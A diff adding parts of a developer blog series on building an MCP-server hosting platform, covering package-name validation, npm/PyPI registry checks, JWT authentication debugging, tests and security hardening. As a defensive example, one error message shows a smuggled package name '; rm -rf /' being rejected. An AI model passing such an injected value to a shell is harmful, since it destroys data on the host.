+**Why regex**: Whitelisting valid characters prevents shell metacharacters (`;`, `|`, `&`, etc.).
+
+### Registry Validation
+
+Syntax validation isn't enough. What if an attacker uses a valid-looking name that doesn't exist?
+
+```
+package: "@attacker/malicious-script"
+```
+
+This would fail during `npx` install, but **after** we've created a machine and stored credentials. Bad.
+
+**Solution**: Check if the package exists in npm/PyPI **before** deployment.
+
+```python
+import httpx
+from typing import Optional
+
+class RegistryService:
+ """Validate packages against npm and PyPI registries"""
+
+ NPM_REGISTRY = "https://registry.npmjs.org"
+ PYPI_REGISTRY = "https://pypi.org/pypi"
+
+ def __init__(self):
+ self.client = httpx.AsyncClient(timeout=10.0)
+
+ async def validate_npm_package(self, package: str) -> bool:
+ """
+ Check if package exists in npm registry.
+
+ Args:
+ package: Package name (e.g., '@scope/package' or 'package')
+
+ Returns:
+ True if package exists
+
+ Raises:
+ ValidationError if package not found
+ """
+ url = f"{self.NPM_REGISTRY}/{package}"
+
+ try:
+ response = await self.client.get(url)
+
+ if response.status_code == 200:
+ return True
+ elif response.status_code == 404:
+ raise ValidationError(
+ f"Package '{package}' not found in npm registry"
+ )
+ else:
+ raise ValidationError(
+ f"npm registry error: {response.status_code}"
+ )
+ except httpx.TimeoutException:
+ raise ValidationError("npm registry timeout")
+
+ async def validate_pypi_package(self, package: str) -> bool:
+ """Check if package exists in PyPI registry"""
+ url = f"{self.PYPI_REGISTRY}/{package}/json"
+
+ try:
+ response = await self.client.get(url)
+
+ if response.status_code == 200:
+ return True
+ elif response.status_code == 404:
+ raise ValidationError(
+ f"Package '{package}' not found in PyPI"
+ )
+ else:
+ raise ValidationError(
+ f"PyPI error: {response.status_code}"
+ )
+ except httpx.TimeoutException:
+ raise ValidationError("PyPI timeout")
+```
+
+**Why external validation**:
+- npm and PyPI are authoritative sources
+- If package doesn't exist, deployment will definitely fail
+- Prevents wasted machine creation and credentials storage
+
+### Credential Validation
+
+Even if the package is valid, deployment will fail if required credentials are missing.
+
+**Example**: TickTick MCP requires `TICKTICK_TOKEN`. If user doesn't provide it:
+
+```
+Deployment created ✓
+Machine started ✓
+MCP server starts... ERROR: TICKTICK_TOKEN not set
+```
+
+**User experience**: Terrible. They deployed, think it worked, then discover tools don't work.
+
+**Solution**: Validate credentials against analysis schema **before** deployment.
+
+```python
+async def validate_credentials(
+ self,
+ credentials: Dict[str, str],
+ analysis: AnalysisResult
+) -> None:
+ """
+ Validate user-provided credentials against analysis schema.
+
+ Raises:
+ ValidationError if required credentials missing
+ """
+ required_vars = [
+ env_var for env_var in analysis.env_vars
+ if env_var.required
+ ]
+
+ missing = []
+ for env_var in required_vars:
+ if env_var.name not in credentials:
+ missing.append(env_var.name)
+
+ if missing:
+ raise ValidationError(
+ f"Missing required credentials: {', '.join(missing)}",
+ details={"missing": missing}
+ )
+
+ # Optional: Validate credential formats
+ for name, value in credentials.items():
+ env_var = next(
+ (ev for ev in analysis.env_vars if ev.name == name),
+ None
+ )
+
+ if env_var and "URL" in name:
+ # Validate URL format
+ try:
+ httpx.URL(value)
+ except Exception:
+ raise ValidationError(
+ f"Invalid URL for {name}: {value}"
+ )
+```
+
+**Result**: Deployments only proceed if:
+1. Package name syntax is valid
+2. Package exists in registry
+3. All required credentials are provided
+4. Credential formats are correct
+
+## The Glama Registry Integration
+
+MCP servers are scattered across GitHub. How do users discover them?
+
+**Enter Glama**: A community registry of MCP servers (like npm search, but for MCP).
+
+**Integration**:
+
+```python
+# backend/app/services/registry_service.py
+class RegistryService:
+ """Search and discover MCP servers via Glama"""
+
+ GLAMA_API = "https://glama.ai/api/mcp/servers"
+
+ async def search_servers(self, query: str) -> List[MCPServerInfo]:
+ """
+ Search Glama registry for MCP servers.
+
+ Args:
+ query: Search query (e.g., "ticktick")
+
+ Returns:
+ List of MCP servers matching query
+ """
+ response = await self.client.get(
+ self.GLAMA_API,
+ params={"q": query, "limit": 20}
+ )
+
+ response.raise_for_status()
+ data = response.json()
+
+ return [
+ MCPServerInfo(
+ name=server["name"],
+ description=server["description"],
+ repo_url=server["repository"],
+ package=server["package"],
+ stars=server.get("stars", 0),
+ verified=server.get("verified", False)
+ )
+ for server in data.get("servers", [])
+ ]
+```
+
+**Frontend integration**:
+
+```typescript
+// frontend/app/discover/page.tsx
+export default function DiscoverPage() {
+ const [query, setQuery] = useState("");
+ const [servers, setServers] = useState([]);
+
+ const handleSearch = async () => {
+ const results = await searchMCPServers(query);
+ setServers(results);
+ };
+
+ return (
+
+
+
+
+ );
+}
+```
+
+**User flow**:
+1. User searches "ticktick"
+2. Glama returns MCP servers matching query
+3. User clicks "Deploy" on a server
+4. Analysis pre-filled from Glama data (faster than analyzing GitHub)
+5. Deployment proceeds with validation
+
+**Why this improves UX**: Users don't need to know GitHub URLs. Just search and deploy.
+
+## Runtime Detection
+
+Should users specify "npm" vs "python"? No. **Auto-detect** it.
+
+```python
+def detect_runtime(package: str) -> str:
+ """
+ Auto-detect runtime from package name.
+
+ Rules:
+ - Starts with '@': npm (scoped package)
+ - Contains '/': npm (@scope/package)
+ - Otherwise: Check both registries
+
+ Returns:
+ 'npm' or 'python'
+ """
+ # Scoped packages are always npm
+ if package.startswith('@') or '/' in package:
+ return "npm"
+
+ # Check both registries (concurrent)
+ npm_task = validate_npm_package(package)
+ pypi_task = validate_pypi_package(package)
+
+ npm_exists, pypi_exists = await asyncio.gather(
+ npm_task, pypi_task,
+ return_exceptions=True
+ )
+
+ if isinstance(npm_exists, Exception) and isinstance(pypi_exists, Exception):
+ raise ValidationError(f"Package '{package}' not found in npm or PyPI")
+
+ # Prefer npm if exists in both (rare but possible)
+ if not isinstance(npm_exists, Exception):
+ return "npm"
+ else:
+ return "python"
+```
+
+**Edge case**: Some packages exist in both npm and PyPI (e.g., `chalk`). Default to npm.
+
+## Deployment Flow with Validation
+
+With validation in place, deployment flow becomes:
+
+```python
+@router.post("/api/deployments")
+async def create_deployment(
+ name: str,
+ repo_url: str,
+ credentials: Dict[str, str]
+):
+ # 1. Retrieve analysis from cache
+ analysis = await analysis_service.get_cached(repo_url)
+ if not analysis:
+ raise HTTPException(400, "Analyze repository first")
+
+ # 2. Validate package syntax
+ package = analysis.package
+ runtime = detect_runtime(package)
+ package_validator.validate_syntax(package, runtime)
+
+ # 3. Validate package exists in registry
+ if runtime == "npm":
+ await registry_service.validate_npm_package(package)
+ else:
+ await registry_service.validate_pypi_package(package)
+
+ # 4. Validate credentials
+ await validate_credentials(credentials, analysis)
+
+ # 5. Create deployment record
+ deployment = Deployment(
+ name=name,
+ repo_url=repo_url,
+ schedule_config={"mcp_config": analysis.dict()},
+ status="pending"
+ )
+ db.add(deployment)
+ await db.commit()
+
+ # 6. Encrypt credentials
+ encrypted = credential_service.encrypt(credentials)
+ credential_record = Credential(
+ deployment_id=deployment.id,
+ encrypted_data=encrypted
+ )
+ db.add(credential_record)
+ await db.commit()
+
+ # 7. Deploy to Fly.io (background task)
+ background_tasks.add_task(
+ fly_service.create_machine,
+ deployment.id,
+ package,
+ credentials
+ )
+
+ return deployment
+```
+
+**Benefits**:
+- Validation happens **before** deployment
+- Clear error messages at each step
+- No wasted machine creation
+- No credentials stored for invalid packages
+
+## Error Messages: User-Facing vs Internal
+
+**Internal error** (before):
+```
+ValidationError: regex pattern '^(@[\w-]+\/)?[\w-]+(\.[\w-]+)*$' did not match input '; rm -rf /'
+```
+
+**User-facing error** (after):
+```json
+{
+ "error": "invalid_package_name",
+ "message": "The package name contains invalid characters. Package names can only contain letters, numbers, hyphens, and underscores.",
+ "details": {
+ "package": "; rm -rf /",
+ "allowed_format": "'package-name' or '@scope/package-name'"
+ }
+}
+```
+
+**Why better UX**: Users understand the problem and how to fix it.
+
+## Security Review: CodeRabbit's Feedback
+
+After implementing validation, CodeRabbit reviewed again:
+
+✅ **RESOLVED**: Command injection vulnerability
+- Package names validated with regex whitelist
+- Registry validation prevents non-existent packages
+- Credential validation prevents runtime errors
+
+⚠️ **NEW ISSUE**: Concurrency race condition in registry service
+
+> Multiple concurrent requests to the same package can cause duplicate validation requests. Consider caching validation results.
+
+**The fix**:
+
+```python
+from functools import lru_cache
+
+class RegistryService:
+ def __init__(self):
+ self.client = httpx.AsyncClient(timeout=10.0)
+ self._cache = {} # In-memory cache
+ self._cache_ttl = 300 # 5 minutes
+
+ async def validate_npm_package(self, package: str) -> bool:
+ # Check cache first
+ if package in self._cache:
+ cached_at, result = self._cache[package]
+ if time.time() - cached_at < self._cache_ttl:
+ return result
+
+ # Validate
+ result = await self._validate_npm_package_uncached(package)
+
+ # Cache result
+ self._cache[package] = (time.time(), result)
+ return result
+```
+
+**Result**: Validation requests reduced by 80% (most users deploy popular packages).
+
+## What I Learned
+
+### Where AI Helped ✅
+- Regex patterns for package name validation
+- HTTP client setup for registry APIs
+- Error message structuring
+
+### Where AI Failed ❌
+- **Didn't think about security** - AI generated the vulnerable code
+- **Didn't consider concurrency** - Race conditions in validation
+- **Over-complicated** - AI suggested database for caching (overkill)
+
+### Human Expertise Required 🧠
+- **Threat modeling**: What could go wrong?
+- **Security validation**: Is this code safe to execute?
+- **UX decisions**: How should validation errors appear?
+- **Performance**: Do we need caching? Where?
+
+**The pattern**: AI writes code. Humans think about what the code **enables attackers to do**.
+
+## Up Next
+
+The platform is now secure:
+- ✅ Package names validated
+- ✅ Registry checks prevent non-existent packages
+- ✅ Credentials validated before deployment
+- ✅ Clear error messages
+
+But there's another problem: **Users can't actually access the platform**.
+
+There's no authentication. No user accounts. No way to manage API keys.
+
+Time to build **authentication**.
+
+That's Part 7: The Authentication Nightmare.
+
+Spoiler: This one nearly broke me.
+
+---
+
+**Key Commits**:
+- `e41576b` - Introduce Glama MCP registry search and dynamic form generation
+- `ec955e6` - Add credential and package validation services
+- `7c2fa06` - Implement registry service and API
+
+**Related Files**:
+- `backend/app/services/package_validator.py` - Package name validation
+- `backend/app/services/registry_service.py` - npm/PyPI validation
+- `backend/app/api/deployments.py` - Validation integration
+
+**Security Resources**:
+- CodeRabbit security review comments
+- OWASP Top 10: Injection vulnerabilities
+
+**Next Post**: [Part 7: The Authentication Nightmare](07-authentication-crisis.md)
diff --git a/blog/07-authentication-crisis.md b/blog/07-authentication-crisis.md
new file mode 100644
index 0000000..c13fc4b
--- /dev/null
+++ b/blog/07-authentication-crisis.md
@@ -0,0 +1,583 @@
+---
+title: "Part 7: The Authentication Nightmare"
+series: "Catwalk Live Development Journey"
+part: 7
+date: 2025-12-20
+updated: 2025-12-27
+tags: [authentication, jwt, nextauth, debugging, crisis]
+reading_time: "15 min"
+commits_covered: "068dc28...a8dfde6"
+---
+
+## The Dark Before the Dawn
+
+December 20, 2025. The platform works beautifully:
+- ✅ Analysis engine extracts MCP config
+- ✅ Validation prevents security holes
+- ✅ Deployments create Fly machines
+- ✅ Streamable HTTP proxies to MCP servers
+- ✅ Claude successfully calls tools
+
+There's just one tiny problem: **Anyone can deploy anything**.
+
+No user accounts. No authentication. No authorization. Just... open endpoints.
+
+Time to fix that. How hard could authentication be?
+
+## Attempt 1: NextAuth.js Setup
+
+AI (Claude Code) suggested NextAuth.js (now "Auth.js"):
+
+```typescript
+// frontend/auth.ts
+import NextAuth from "next-auth"
+import Google from "next-auth/providers/google"
+
+export const { handlers, auth, signIn, signOut } = NextAuth({
+ providers: [
+ Google({
+ clientId: process.env.GOOGLE_CLIENT_ID!,
+ clientSecret: process.env.GOOGLE_CLIENT_SECRET!,
+ })
+ ],
+ callbacks: {
+ async signIn({ user, account }) {
+ // Sync user to backend database
+ // TODO: Implement this
+ return true
+ }
+ }
+})
+```
+
+Deployed. Sign-in modal works. Google OAuth succeeds. User sees their email in the navbar.
+
+**Perfect! Ship it.**
+
+## The 401 Error Wall
+
+December 20, 3 PM. First real test: create a deployment.
+
+```
+POST /api/deployments
+Authorization: Bearer
+
+Response: 401 Unauthorized
+```
+
+**What?** The user is signed in. The JWT is in the header. Why 401?
+
+Checked backend logs:
+
+```
+2025-12-20T15:23:45Z [error] JWT verification failed: Invalid signature
+```
+
+**The problem**: Frontend generates JWT. Backend verifies JWT. They're using **different secrets**.
+
+**Frontend** (`.env.local`):
+```
+AUTH_SECRET=abc123...
+```
+
+**Backend** (Fly.io secrets):
+```
+AUTH_SECRET=xyz789...
+```
+
+**The fix**: Make sure secrets **match exactly**.
+
+```bash
+# Generate secret once
+AUTH_SECRET=$(openssl rand -base64 32)
+
+# Set on backend
+fly secrets set AUTH_SECRET="$AUTH_SECRET" --app catwalk-backend
+
+# Set on frontend (.env.local)
+echo "AUTH_SECRET=\"$AUTH_SECRET\"" >> frontend/.env.local
+```
+
+Redeployed. Tried again:
+
+```
+POST /api/deployments
+Authorization: Bearer
+
+Response: 401 Unauthorized
+```
+
+**Still broken.** Different error:
+
+```
+2025-12-20T16:05:12Z [error] User not found in database: user@example.com
+```
+
+## The Silent User Sync Failure
+
+**What happened**: User signed in via Google OAuth. Frontend has user info. But backend **has no record of this user**.
+
+**Why**: The `signIn` callback that should sync users to the backend... wasn't implemented.
+
+**AI's generated code**:
+
+```typescript
+async signIn({ user, account }) {
+ // TODO: Sync user to backend database
+ return true
+}
+```
+
+Literally a TODO. **And I shipped it.**
+
+**Lesson 1**: Never skip TODOs. Always verify AI-generated code is complete.
+
+**The fix**: Implement user sync.
+
+```typescript
+// frontend/auth.ts
+export const { handlers, auth, signIn, signOut } = NextAuth({
+ providers: [Google(...)],
+ callbacks: {
+ async signIn({ user, account }) {
+ // Sync user to backend
+ try {
+ const response = await fetch(
+ `${process.env.NEXT_PUBLIC_BACKEND_URL}/api/auth/sync-user`,
+ {
+ method: "POST",
+ headers: {
+ "Content-Type": "application/json",
+ "X-Auth-Secret": process.env.AUTH_SYNC_SECRET!
+ },
+ body: JSON.stringify({
+ email: user.email,
+ name: user.name,
+ provider: account.provider,
+ provider_id: account.providerAccountId
+ })
+ }
+ );
+
+ if (!response.ok) {
+ console.error("User sync failed:", await response.text());
+ return false; // Block sign-in if sync fails
+ }
+
+ return true;
+ } catch (error) {
+ console.error("User sync error:", error);
+ return false;
+ }
+ }
+ }
+})
+```
+
+**Backend endpoint**:
+
+```python
+# backend/app/api/auth.py
+from fastapi import APIRouter, HTTPException, Header
+
+router = APIRouter()
+
+@router.post("/auth/sync-user")
+async def sync_user(
+ email: str,
+ name: str,
+ provider: str,
+ provider_id: str,
+ x_auth_secret: str = Header(None, alias="X-Auth-Secret")
+):
+ """
+ Sync user from frontend to backend database.
+
+ Called by NextAuth.js after successful OAuth sign-in.
+
+ Security: Protected by AUTH_SYNC_SECRET header.
+ """
+
+ # Verify sync secret
+ if x_auth_secret != settings.AUTH_SYNC_SECRET:
+ raise HTTPException(403, "Invalid auth sync secret")
+
+ # Create or update user
+ async with get_session() as db:
+ user = await db.execute(
+ select(User).where(User.email == email)
+ )
+ user = user.scalar_one_or_none()
+
+ if not user:
+ # Create new user
+ user = User(
+ email=email,
+ name=name,
+ provider=provider,
+ provider_id=provider_id
+ )
+ db.add(user)
+ else:
+ # Update existing user
+ user.name = name
+
+ await db.commit()
+ return {"id": str(user.id), "email": user.email}
+```
+
+Deployed. Signed in. Checked logs:
+
+```
+2025-12-20T17:30:22Z [info] User synced: user@example.com
+```
+
+**Success!** User now exists in database.
+
+Tried creating a deployment:
+
+```
+POST /api/deployments
+Authorization: Bearer
+
+Response: 401 Unauthorized
+```
+
+**STILL BROKEN.**
+
+## The Great Secret Confusion
+
+December 20, 6 PM. I'm debugging for 3 hours. The error:
+
+```
+2025-12-20T18:45:33Z [error] JWT verification failed: Invalid signature
+```
+
+But the `AUTH_SECRET` matches! I've checked 10 times!
+
+**Then I noticed**: Two different secrets in the environment variables.
+
+**Frontend `.env.local`**:
+```
+AUTH_SECRET=abc123...
+AUTH_SYNC_SECRET=def456...
+```
+
+**Backend Fly.io**:
+```
+AUTH_SECRET=xyz789...
+AUTH_SYNC_SECRET=def456...
+```
+
+**The problem**: `AUTH_SECRET` still didn't match. I had set `AUTH_SYNC_SECRET` correctly but never updated `AUTH_SECRET` on the backend.
+
+**The confusion**: Two secrets with similar names:
+1. **`AUTH_SECRET`**: Signs/verifies JWT tokens for API authentication
+2. **`AUTH_SYNC_SECRET`**: Secures the `/auth/sync-user` endpoint
+
+**Why two secrets?**:
+- `AUTH_SECRET` must be shared between frontend and backend (JWT verification)
+- `AUTH_SYNC_SECRET` is server-to-server only (prevents external calls to sync endpoint)
+
+**The fix** (for real this time):
+
+```bash
+# Generate BOTH secrets
+AUTH_SECRET=$(openssl rand -base64 32)
+AUTH_SYNC_SECRET=$(openssl rand -base64 32)
+
+# Set on backend
+fly secrets set \
+ AUTH_SECRET="$AUTH_SECRET" \
+ AUTH_SYNC_SECRET="$AUTH_SYNC_SECRET" \
+ --app catwalk-backend
+
+# Set on frontend
+cat >> frontend/.env.local <
+
+Response: 201 Created
+{
+ "id": "...",
+ "name": "My TickTick",
+ "status": "deploying"
+}
+```
+
+**IT WORKS!** After 4 hours of debugging.
+
+## The Authentication Flow (Final)
+
+Here's the complete flow that finally worked:
+
+### Step 1: User Signs In
+
+```
+User clicks "Sign in with Google"
+ ↓
+NextAuth.js redirects to Google OAuth
+ ↓
+User authorizes application
+ ↓
+Google redirects back to /api/auth/callback/google
+ ↓
+NextAuth.js signIn callback fires
+```
+
+### Step 2: User Sync
+
+```typescript
+// frontend/auth.ts signIn callback
+async signIn({ user, account }) {
+ // POST to backend /api/auth/sync-user
+ // Headers: X-Auth-Secret (server-to-server auth)
+ // Body: { email, name, provider, provider_id }
+
+ // Backend creates/updates user in database
+ // Returns user ID
+
+ return true; // Allow sign-in
+}
+```
+
+### Step 3: JWT Token Generation
+
+```typescript
+// frontend/auth.ts jwt callback
+async jwt({ token, user }) {
+ // Add user ID to JWT payload
+ if (user) {
+ token.userId = user.id;
+ }
+ return token;
+}
+```
+
+### Step 4: API Request with JWT
+
+```typescript
+// frontend/lib/api.ts
+export async function createDeployment(data: DeploymentCreate) {
+ const session = await auth(); // Get NextAuth session
+
+ // Generate JWT for backend
+ const jwt = await createBackendAccessToken(session);
+
+ const response = await fetch(
+ `${BACKEND_URL}/api/deployments`,
+ {
+ method: "POST",
+ headers: {
+ "Authorization": `Bearer ${jwt}`,
+ "Content-Type": "application/json"
+ },
+ body: JSON.stringify(data)
+ }
+ );
+
+ return response.json();
+}
+```
+
+### Step 5: Backend JWT Verification
+
+```python
+# backend/app/middleware/auth.py
+from jose import jwt, JWTError
+
+async def verify_jwt_token(token: str) -> User:
+ """
+ Verify JWT token and return user.
+
+ Raises:
+ HTTPException(401) if token invalid
+ """
+ try:
+ payload = jwt.decode(
+ token,
+ settings.AUTH_SECRET,
+ algorithms=["HS256"]
+ )
+
+ user_id = payload.get("userId")
+ if not user_id:
+ raise HTTPException(401, "Invalid token: missing userId")
+
+ # Fetch user from database
+ async with get_session() as db:
+ user = await db.get(User, user_id)
+ if not user:
+ raise HTTPException(401, "User not found")
+
+ return user
+
+ except JWTError:
+ raise HTTPException(401, "Invalid token")
+```
+
+### Step 6: Protected Endpoint
+
+```python
+# backend/app/api/deployments.py
+from app.middleware.auth import get_current_user
+
+@router.post("/deployments")
+async def create_deployment(
+ data: DeploymentCreate,
+ user: User = Depends(get_current_user)
+):
+ """
+ Create deployment (authenticated endpoint).
+
+ The get_current_user dependency:
+ 1. Extracts Authorization header
+ 2. Verifies JWT signature
+ 3. Fetches user from database
+ 4. Returns user object (or raises 401)
+ """
+
+ deployment = Deployment(
+ user_id=user.id, # Associate with authenticated user
+ **data.dict()
+ )
+
+ # ... rest of deployment logic
+```
+
+## The Debugging Methodology
+
+What worked for debugging authentication:
+
+### 1. Logging at Every Step
+
+```python
+# backend/app/middleware/auth.py
+import logging
+logger = logging.getLogger(__name__)
+
+async def verify_jwt_token(token: str) -> User:
+ logger.info(f"Verifying token: {token[:20]}...") # Don't log full token
+
+ try:
+ payload = jwt.decode(...)
+ logger.info(f"Token decoded successfully. User ID: {payload.get('userId')}")
+ # ... rest
+ except JWTError as e:
+ logger.error(f"JWT verification failed: {str(e)}")
+ raise
+```
+
+**This revealed**: "JWT verification failed: Invalid signature" → secrets mismatch
+
+### 2. Manual JWT Decoding
+
+```bash
+# Decode JWT without verification (to see payload)
+echo "eyJhbGciOi..." | base64 -d | jq
+```
+
+**This revealed**: `userId` field missing → jwt callback not adding it
+
+### 3. Testing Each Component Separately
+
+```bash
+# Test user sync directly
+curl -X POST https://backend.fly.dev/api/auth/sync-user \
+ -H "X-Auth-Secret: $AUTH_SYNC_SECRET" \
+ -H "Content-Type: application/json" \
+ -d '{"email": "test@example.com", "name": "Test", "provider": "google", "provider_id": "123"}'
+
+# Test JWT verification
+curl https://backend.fly.dev/api/deployments \
+ -H "Authorization: Bearer $JWT"
+```
+
+### 4. Documentation
+
+I created `AUTH_TROUBLESHOOTING.md`:
+
+```markdown
+# Authentication Troubleshooting
+
+## 401 Errors Checklist
+
+1. **Verify secrets match**:
+ - Frontend `.env.local`: `AUTH_SECRET`
+ - Backend Fly.io: `fly secrets list --app catwalk-backend`
+ - Must be IDENTICAL
+
+2. **Check user sync**:
+ - Sign in
+ - Check backend logs: "User synced: "
+ - If missing: `AUTH_SYNC_SECRET` mismatch or network error
+
+3. **Verify JWT payload**:
+ - Decode JWT: `echo $JWT | base64 -d`
+ - Must contain: `{"userId": "..."}`
+
+4. **Check backend logs**:
+ - `fly logs --app catwalk-backend`
+ - Look for: "JWT verification failed"
+```
+
+**This saved me** when the same issue appeared during frontend Vercel deployment.
+
+## What I Learned
+
+### Where AI Helped ✅
+- NextAuth.js setup boilerplate
+- JWT signing/verification code
+- Database user model
+
+### Where AI Failed ❌
+- **Incomplete implementation**: TODOs in production code
+- **Secret management confusion**: Didn't explain AUTH_SECRET vs AUTH_SYNC_SECRET
+- **Error handling**: Generic errors, not actionable
+- **Testing**: No auth flow tests generated
+
+### Human Debugging Required 🧠
+- **Secret synchronization**: AI can't check environment variables across systems
+- **Flow understanding**: Tracking requests through frontend → backend → database
+- **Error interpretation**: "Invalid signature" means secrets mismatch
+- **Documentation**: Creating troubleshooting guides
+
+**The pattern**: AI writes code. Humans debug when code interacts with external systems (OAuth, secrets, databases).
+
+## Up Next
+
+Authentication works! Users can sign in, create deployments, manage their MCP servers.
+
+But the code quality is... questionable. No tests. Security reviews pending. Edge cases uncovered.
+
+Time for **Security Hardening & Production Polish**.
+
+That's Part 8.
+
+---
+
+**Key Commits**:
+- `068dc28` - Implement user settings for API key management
+- `2f42cff` - Implement JWT-based authentication
+- `efbac5c` - Implement JWT authentication and user management with Auth.js
+- `a8dfde6` - Fix 401 errors and add comprehensive authentication troubleshooting
+
+**Related Files**:
+- `frontend/auth.ts` - NextAuth.js configuration
+- `backend/app/middleware/auth.py` - JWT verification
+- `backend/app/api/auth.py` - User sync endpoint
+- `context/AUTH_TROUBLESHOOTING.md` - Debugging guide
+
+**Debugging Resources**:
+- [NextAuth.js Callbacks](https://next-auth.js.org/configuration/callbacks)
+- [JWT Decoder](https://jwt.io/)
+
+**Next Post**: [Part 8: Security Hardening & Production Ready](08-security-hardening-production.md)
diff --git a/blog/08-security-hardening-production.md b/blog/08-security-hardening-production.md
new file mode 100644
index 0000000..8425cf8
--- /dev/null
+++ b/blog/08-security-hardening-production.md
@@ -0,0 +1,612 @@
+---
+title: "Part 8: Security Hardening & Production Ready"
+series: "Catwalk Live Development Journey"
+part: 8
+date: 2025-12-21
+updated: 2025-12-27
+tags: [security, testing, production, hardening, deployment]
+reading_time: "14 min"
+commits_covered: "02f9346...890c67a"
+---
+
+## The Final Push
+
+December 21, 2025. The platform works:
+- ✅ Users can sign in
+- ✅ Analysis extracts MCP config
+- ✅ Validation prevents security holes
+- ✅ Deployments create Fly machines
+- ✅ Claude successfully calls tools
+
+But "works" ≠ "production-ready."
+
+**What's missing**:
+- Tests (we have... zero)
+- Security hardening (beyond basic validation)
+- Error handling for edge cases
+- Production deployment (frontend still localhost only)
+- Performance optimization
+
+Time to go from **"working prototype"** to **"production system"**.
+
+## PR #12: The Testing Blitz
+
+### The Problem
+
+No tests. Not a single one. Every change was tested manually: deploy, click around, check logs.
+
+**This doesn't scale.**
+
+AI (Claude Code) was prompted:
+
+> Write comprehensive integration tests for all API endpoints. Cover:
+> - Health checks
+> - Authentication
+> - Analysis (cache hit/miss)
+> - Deployments (create, list, get)
+> - MCP endpoints
+> - Settings management
+> - Registry search
+
+### The Result: 51 Tests
+
+```python
+# backend/tests/integration/test_api_health.py
+import pytest
+from httpx import AsyncClient
+
+@pytest.mark.asyncio
+async def test_health_endpoint(client: AsyncClient):
+ """Health endpoint should return 200 OK"""
+ response = await client.get("/api/health")
+ assert response.status_code == 200
+ assert response.json() == {"status": "healthy"}
+
+# backend/tests/integration/test_api_analyze.py
+@pytest.mark.asyncio
+async def test_analyze_repo_success(client: AsyncClient):
+ """Analysis should succeed for valid MCP repo"""
+ response = await client.post(
+ "/api/analyze",
+ json={"repo_url": "https://github.com/hong-hao/mcp-ticktick"}
+ )
+ assert response.status_code == 200
+ data = response.json()
+ assert "package" in data
+ assert "env_vars" in data
+
+@pytest.mark.asyncio
+async def test_analyze_cache_hit(client: AsyncClient, mock_claude_api):
+ """Second analysis should hit cache"""
+ repo_url = "https://github.com/hong-hao/mcp-ticktick"
+
+ # First request (cache miss)
+ response1 = await client.post("/api/analyze", json={"repo_url": repo_url})
+ assert mock_claude_api.call_count == 1
+
+ # Second request (cache hit)
+ response2 = await client.post("/api/analyze", json={"repo_url": repo_url})
+ assert mock_claude_api.call_count == 1 # Still 1 (not called again)
+ assert response2.json() == response1.json()
+
+# backend/tests/integration/test_api_deployments.py
+@pytest.mark.asyncio
+async def test_create_deployment_unauthorized(client: AsyncClient):
+ """Creating deployment without auth should return 401"""
+ response = await client.post(
+ "/api/deployments",
+ json={"name": "Test", "repo_url": "..."}
+ )
+ assert response.status_code == 401
+
+@pytest.mark.asyncio
+async def test_create_deployment_success(
+ auth_client: AsyncClient,
+ mock_analysis,
+ mock_fly_api
+):
+ """Authenticated user can create deployment"""
+ response = await auth_client.post(
+ "/api/deployments",
+ json={
+ "name": "My TickTick",
+ "repo_url": "https://github.com/hong-hao/mcp-ticktick",
+ "credentials": {"TICKTICK_TOKEN": "test-token"}
+ }
+ )
+ assert response.status_code == 201
+ data = response.json()
+ assert data["name"] == "My TickTick"
+ assert data["status"] == "deploying"
+ assert "id" in data
+ assert "access_token" in data
+```
+
+**Unit tests for services**:
+
+```python
+# backend/tests/unit/test_registry_service.py
+@pytest.mark.asyncio
+async def test_validate_npm_package_exists():
+ """Should validate existing npm package"""
+ service = RegistryService()
+ result = await service.validate_npm_package("@modelcontextprotocol/sdk")
+ assert result is True
+
+@pytest.mark.asyncio
+async def test_validate_npm_package_not_found():
+ """Should raise error for non-existent package"""
+ service = RegistryService()
+ with pytest.raises(ValidationError, match="not found"):
+ await service.validate_npm_package("@fake/nonexistent-package-xyz")
+
+# backend/tests/unit/test_mcp_process_manager.py
+@pytest.mark.asyncio
+async def test_spawn_process_npm():
+ """Should spawn npm MCP server process"""
+ manager = MCPProcessManager()
+ process = await manager.spawn(
+ package="@modelcontextprotocol/server-filesystem",
+ env={"ALLOWED_DIRECTORIES": "/tmp"}
+ )
+ assert process.returncode is None # Running
+ await manager.kill(process.pid)
+```
+
+### Test Coverage
+
+```bash
+pytest --cov=app tests/
+
+Coverage Report:
+ app/api/analyze.py 92%
+ app/api/deployments.py 88%
+ app/api/mcp_streamable.py 85%
+ app/services/ 91%
+ app/middleware/ 94%
+
+ Total: 89%
+```
+
+**89% coverage.** Not perfect, but solid.
+
+### What Tests Caught
+
+Running tests revealed bugs:
+
+1. **Cache expiration bug**: Timezone-aware vs naive datetime comparison
+
+```python
+# Bug: This fails when database returns timezone-aware datetime
+if datetime.now() > cached.expires_at:
+ return None
+
+# Fix: Use UTC explicitly
+if datetime.utcnow() > cached.expires_at:
+ return None
+```
+
+2. **Credential validation bug**: Didn't handle optional env vars correctly
+
+```python
+# Bug: Required all env vars, even optional ones
+missing = [v for v in env_vars if v.name not in credentials]
+
+# Fix: Only check required env vars
+missing = [
+ v for v in env_vars
+ if v.required and v.name not in credentials
+]
+```
+
+3. **Deployment background task bug**: Credentials not passed to Fly API
+
+```python
+# Bug: credentials_data undefined in background task scope
+background_tasks.add_task(deploy_to_fly, deployment.id)
+
+# Fix: Pass credentials explicitly
+background_tasks.add_task(
+ deploy_to_fly,
+ deployment.id,
+ credentials_data=credentials
+)
+```
+
+**Lesson**: Tests find bugs that manual testing misses. Always test edge cases.
+
+## PR #13: Security Hardening
+
+### The CodeRabbit Review
+
+After PR #12 merged, CodeRabbit reviewed the entire codebase. Findings:
+
+#### 1. Secrets Leaking in Logs
+
+**Issue**:
+```python
+logger.info(f"Creating deployment: {deployment.dict()}")
+# Logs: {..., "credentials": {"TICKTICK_TOKEN": "secret-value"}}
+```
+
+**Fix**: Filter sensitive fields
+
+```python
+def safe_dict(obj, exclude_fields=["credentials", "access_token", "encrypted_data"]):
+ """Convert model to dict, excluding sensitive fields"""
+ data = obj.dict() if hasattr(obj, 'dict') else dict(obj)
+ return {k: v for k, v in data.items() if k not in exclude_fields}
+
+logger.info(f"Creating deployment: {safe_dict(deployment)}")
+# Logs: {..., "name": "My TickTick", "status": "deploying"} # No secrets
+```
+
+#### 2. CORS Misconfiguration
+
+**Issue**:
+```python
+app.add_middleware(
+ CORSMiddleware,
+ allow_origins=["*"], # Allows ANY origin
+ allow_credentials=True
+)
+```
+
+**Fix**: Restrict to specific origins
+
+```python
+app.add_middleware(
+ CORSMiddleware,
+ allow_origins=[
+ "http://localhost:3000", # Local dev
+ "https://catwalk.vercel.app" # Production frontend
+ ],
+ allow_credentials=True
+)
+```
+
